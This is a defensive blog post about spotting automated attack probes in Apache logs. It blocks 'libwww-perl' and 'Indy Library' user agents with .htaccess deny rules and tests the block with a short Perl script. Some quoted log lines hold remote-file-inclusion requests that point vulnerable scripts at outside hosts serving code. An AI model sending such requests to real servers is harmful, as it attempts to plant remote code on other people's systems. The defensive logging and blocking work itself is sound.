Here are some sample lines from our server logs ... and I don't like the look of them!
from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24
from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17
Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (which is also know as the "User Agent") - are very likely to be attempting to find a security hole in our site scripts, through which they can copy themselves onto our server and then continue to infect other systems, or to use our site to advertise their own by injecting their own URLs. So what are "Indy Library" and "libwww-perl"?
Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...
libwww is from the Perl LWP (Library for WorldWideWeb in Perl) library, so in this case, it's probable that someone has written an automated program In Perl ...
Automated programs are a necessity - and indeed we welcome well behaved crawlers from the well known Google and Yahoo through to more obscure ones too, but authors of such crawlers who know properly what they're doing change the User Agent string rather than using the default - in my experience, we really
don't want the default crawlers on our site, which are at least 90% malicious, with the remaining 10% being amateur. So how can we turn them off?
Standard practise is to deny specific user agents via the robots.txt file -
but chances are that the naughty bots won't respect that so we need to enforce the rule!
Here are three lines that I've added to our
.htaccess file ...
SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys
Which will send out a
403 Forbidden message to the automata, telling them that they can't have the page they seek. Goodness knows what the receiveing bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.
How do we test that?
Here's a simple Perl script that will declare itself as being libwww:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
$res = $ua->request($req);
if ($res->is_success) {
print $res->content;
} else {
print "Error: " . $res->status_line . "\n";
}
And when I run that, it now gives me:
-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$
If I add the line:
$ua->agent("Well House Consultants Bot");
into that program, I get a much more satisfying result back ...
-bash-3.2$ perl pg2
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on
Links - full source code of our test program without and with our own user agent being set.
One of the matters that I considered very carefully indeed before blocking these use agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater if you like. Not the case, I believe - as most people who have legit babies take good care of them and name them properly, but I will be watching my log files none the less to check.
As I finished writing this article - some poetic justice from my log file ...
64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty- programs-looking-for-security-holes-on-your- server-.html/errors.php?error= http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes and firmly being denied access.(written 2008-09-13 08:28:48)
Associated topics are indexed under
A606 - Web Application Deployment - Apache - log files and log file tools
Some other Articles
Spiders WebRegular Expressions in PHPWhat does an browser understand? What does an HTML document contain?I have been working hard but I do not expect you noticedlibwww-perl and Indy Library in your server logs?What have iTime, honeytrapagency and domain listing center got in common?Refactoring - a PHP demo becomes a production pageWhich country does a search engine think you are located in?All the pieces fall into place - hotel and coursesThe road ahead - Python 3